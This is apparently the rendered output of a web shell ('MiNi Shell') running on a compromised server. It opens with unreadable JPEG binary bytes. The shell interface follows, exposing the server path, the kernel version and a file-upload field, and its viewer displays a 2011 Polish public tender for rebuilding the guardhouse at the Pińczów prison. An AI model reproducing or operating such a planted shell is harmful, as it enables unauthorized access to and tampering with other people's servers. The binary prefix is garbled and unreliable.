JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111102/286227-N-2011.html

<p class="kh_header"><b>Pińczów: Przebudowa i nadbudowa budynku wartowni oraz poczekalni dla osób odwiedzających z pokojami konwojowymi w Zakładzie Karnym w Pińczowie</b><br>
<b>Numer ogłoszenia: 286227 - 2011; data zamieszczenia: 02.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Pińczowie , ul. 3-go  Maja 34, 28-400 Pińczów, woj. świętokrzyskie, tel. 041 3577372, faks 041 3577373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieziennictwo.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i nadbudowa budynku wartowni oraz poczekalni dla osób odwiedzających z pokojami konwojowymi w Zakładzie Karnym w Pińczowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie  robót budowlanych polegających na:  Przebudowa i nadbudowa budynku wartowni oraz poczekalni dla osób odwiedzających z pokojami konwojowymi w Zakładzie Karnym w Pińczowie. 
Kod CPV: 
45100000-8   Przygotowanie terenu pod budowę
45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej
45300000-0   Roboty instalacyjne w budynkach
45400000-1   Roboty wykończeniowe w zakresie obiektów budowlanych
45312000-7   Instalowanie systemów alarmowych i anten
45312100-8   Instalowanie przeciwpożarowych systemów alarmowych
45311100-1   Roboty w zakresie okablowania elektrycznego
45312200-9   Instalowanie przeciwwłamaniowych systemów alarmowych
32300000-6   Odbiorniki telewizyjne i radiowe oraz aparatura nagrywająca dźwięk lub obraz lub aparatura powielająca
45314300-4   Instalowanie infrastruktury okablowania
32410000-0   Lokalna sieć komputerowa
32420000-3   Urządzenia sieciowe
35121000-8   Urządzenia ochronne
45314000-1   Instalowanie urządzeń telekomunikacyjnych
45000000-7   Roboty budowlane
45332000-3   Roboty instalacyjne wodne i kanalizacyjne
45331000-6   Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości: 30 000,00zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli złoży on wraz z ofertą wszystkie dokumenty wskazane w części VII SIWZ, wykazujące spełnienie wymagań tam określonych. Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznany przez zamawiającego, jako niespełnienie warunków udziału w postępowaniu, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli złoży on wraz z ofertą wszystkie dokumenty wskazane w części VII SIWZ, wykazujące spełnienie wymagań tam określonych. Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznany przez zamawiającego, jako niespełnienie warunków udziału w postępowaniu, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli złoży on wraz z ofertą wszystkie dokumenty wskazane w części VII SIWZ, wykazujące spełnienie wymagań tam określonych. Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznany przez zamawiającego, jako niespełnienie warunków udziału w postępowaniu, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznany przez zamawiającego, jako niespełnienie warunków udziału w postępowaniu, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli złoży on wraz z ofertą wszystkie dokumenty wskazane w części VII SIWZ, wykazujące spełnienie wymagań tam określonych. Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznany przez zamawiającego, jako niespełnienie warunków udziału w postępowaniu, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Opis warunków udziału w postępowaniu i opis sposobu dokonywania oceny  spełniania tych warunków.
Opis warunków udziału w postępowaniu 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
2)	posiadają odpowiednią  wiedzę  i doświadczenie zawodowe:
3)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)    znajdują się w sytuacji ekonomicznej i finansowej pozwalającej na realizacje zamówienia;
5)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
 Opis sposobu dokonywania oceny spełniania tych warunków 
1.	Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli złoży on wraz z ofertą wszystkie dokumenty wskazane w części VII SIWZ, wykazujące spełnienie wymagań tam określonych. Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznany przez zamawiającego, jako niespełnienie warunków udziału w postępowaniu, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.
2.	Zamawiający wezwie wykonawców, którzy przed upływem terminu składania ofert;
a)	nie złożą wymaganych przez Zamawiającego oświadczeń lub dokumentów,
b)	nie złożą pełnomocnictw
c)	złożą wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy
d)	złożą wadliwe pełnomocnictwa, 
do złożenia właściwych oświadczeń, dokumentów lub pełnomocnictw w wyznaczonym terminie. 
3.	Zamawiający zaniecha wzywania wykonawcy do uzupełnień, o których mowa w ust. 2, jeżeli mimo ich złożenia oferta wykonawcy będzie podlegać odrzuceniu albo konieczne będzie unieważnienie postępowania.
4.	Oświadczenia i dokumenty składane na wezwanie zamawiającego muszą potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert (art. 26 ust. 3 Pzp).
5.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, jednak każdy z wykonawców musi załączyć do oferty, stosownie do art. 44 ustawy, oświadczenie o spełnieniu warunków wynikających z art. 22 ust. 1 ustawy  oraz o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia (zgodnie z art.24 ust.1 i ust.2 pkt.1) - zał. nr 1 i 2 do SIWZ,  jak i również  dokumenty, o których mowa w części VII pkt 1  SIWZ, a wszyscy wykonawcy muszą razem załączyć do oferty dokumenty, o których mowa w  części VII pkt 2,3  SIWZ.  Ponadto wykonawcy wspólnie ubiegający się o udzielenia zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta wykonawców, wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców, zgodnie z art. 23 ustawy.
6.	Wszelka korespondencja oraz rozliczenia dokonywane będą z Wykonawcą wskazanym i upoważnionym w pełnomocnictwie przez pozostałych Wykonawców do reprezentowania.
7.	Wykonawcy muszą dołączyć do oferty pełnomocnictwo, podpisane przez upoważnionych przedstawicieli wszystkich pozostałych Wykonawców.
8.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą, zgodnie z art. 24 ust. 4 ustawy. 

Wykaz   oświadczeń i dokumentów  jakie mają dostarczyć Wykonawcy z ofertą w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
Wykonawca składający ofertę winien załączyć do niej, stosownie do art. 44 ustawy Pzp, oświadczenie o spełnieniu warunków wynikających z art. 22 ust. 1 ustawy Pzp oraz o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia (zgodnie z art.24 ust.1 i ust.2 pkt.1) - zał. nr 1 i 2 do SIWZ;
Na potwierdzenie spełniania warunków wynikających ze złożonych w/w  oświadczeń należy dołączyć następujące dokumenty:

1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy , Zamawiający żąda: 
1) 	koncesji, zezwolenia lub licencji, jeżeli ustawy na?kładają obowiązek posiadania koncesji, zezwole?nia lub licencji na podjęcie działalności gospodar?czej w zakresie objętym zamówieniem wskazanym w niniejszym ogłoszeniu; 
2)	aktualnego odpisu z właściwego rejestru albo ak?tualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, przy czym odpis albo zaświadczenie nie może być wystawione? wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
3)	aktualnych zaświadczeń: 
a)	właściwego naczelnika urzędu skarbowego oraz 
b)	właściwego oddziału Za?kładu Ubezpieczeń Społecznych lub Kasy Rolni?czego Ubezpieczenia Społecznego 
	- potwierdzają?cych odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, przy czym dokumenty nie mogą być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
4) 	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy , przy czym informacja nie może być wystawiona wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2. 	W celu potwierdzenia opisanego przez zama?wiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda: 
1)	wykazu (wzór stanowi załącznik nr 5 do SIWZ)  przynajmniej  trzech wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zo?stały wykonane należycie (referencje), przy czym z załączonych dokumentów musi wynikać, że: 
a)	co najmniej dwie z wykazanych robót budowlanych swoim rodzajem obejmują budynki użyteczności publicznej, 
b)	wartość robót w wykazanych robotach budowlanych budynków użyteczności publicznej jest nie mniejsza niż 750 000 zł każdego z nich; 
2)	wykazu (wzór stanowi załącznik nr 6 do SIWZ)  niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca, z zaznaczeniem podstawy prawnej dysponowania wykazanymi narzędziami i urządzeniami lub wskazaniem przyszłego dysponowania wykazanymi narzędziami i urządzeniami, przy czym zamawiający wymaga wykazania co najmniej: 
a)	urządzenia do pionowego transportu materiałów budowlanych na wysokość nie mniejszą niż 4,5 m, 
b)	1 ładowarki lub koparki o pojemności łyżki nie mniejszej niż 0,25 m3, 
c)	1 samochodu samowyładowczego o ładowności co najmniej 5 ton, 
d)	1 samochodu ciężarowego do transportu poziomego materiałów budowlanych o ładowności nie mniejszej niż 5 ton,
3)	pisemnego zobowiązania innych niż wykonawca podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 2 wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował; 
4)	wykazu (wzór stanowi załącznik nr 7 do  SIWZ)   osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez te osoby czynności z zaznaczeniem podstawy prawnej dysponowania wykazanymi osobami lub wskazaniem przyszłego dysponowania wykazanymi osobami, przy czym zamawiający wymaga wykazania co najmniej osób posiadających uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lutego 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 i poz. 1217) w zakresie: 
a)	konstrukcyjno-bu?dowlanej - co najmniej jedna osoba, 	
b)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - co najmniej jedna osoba, 
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektro-ener-getycznych - co najmniej jedna osoba; 
5)	pisemnego zobowiązania innych niż wykonawca podmiotów do tego, aby wykonawca mógł dysponować wykazanymi osobami, jeżeli w wykazie, o którym mowa w pkt 4 wykonawca wskazał osoby, którymi będzie dysponował; 
6)	dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (zaświadczenie o przynależności do właściwej izby samorządu zawodowego, dokument stwierdzający posiadanie ubezpieczenia odpowiedzialności cywilnej i dokument stwierdzający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lutego 1994 r. Prawo budowlane). 
3. 	W celu potwierdzenia opisanego przez zama?wiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda: 
1)	informacji banku lub spółdzielczej kasy oszczędno?ścio?wo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wy?konawcy, informacja nie może być wystawione? wcześniej niż 3 miesiące przed upływem terminu składania ofert, przy czym z informacji musi wynikać, że wykonawca posiada środki finansowe lub zdolność kredytową na łączną kwotę co najmniej 750 000 zł; 
2)	polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpie?czony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 2 500 000 zł. 
4. 	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się do § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. 
5. 	W celu potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają wymaganiom określonym przez zamawiającego, zamawiający żąda zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym. 
6. 	Wykonawca może zamiast zaświadczeń, o których mowa w w/w ust. 5 złożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego.
7. 	Wykonawca ma obowiązek składać dokumenty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
8. 	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
9.  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
10.  Wykonawcy występujący wspólnie załączą do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania i zawarcia umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Długość gwarancji na roboty budowlane w miesiącach - 15</li>
<li>3 - Termin wykonania w miesiącach - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia nieodpłatnie  na pisemny wniosek zainteresowanego  można odebrać w siedzibie Zamawiającego, lok. 20 lub ściągnąć ze  strony internetowej www.sw.gov.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2011 godzina 08:30, miejsce: Oferty należy składać w siedzibie Zamawiającego -  sekretariat Zakładu Karnego w Pińczowie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com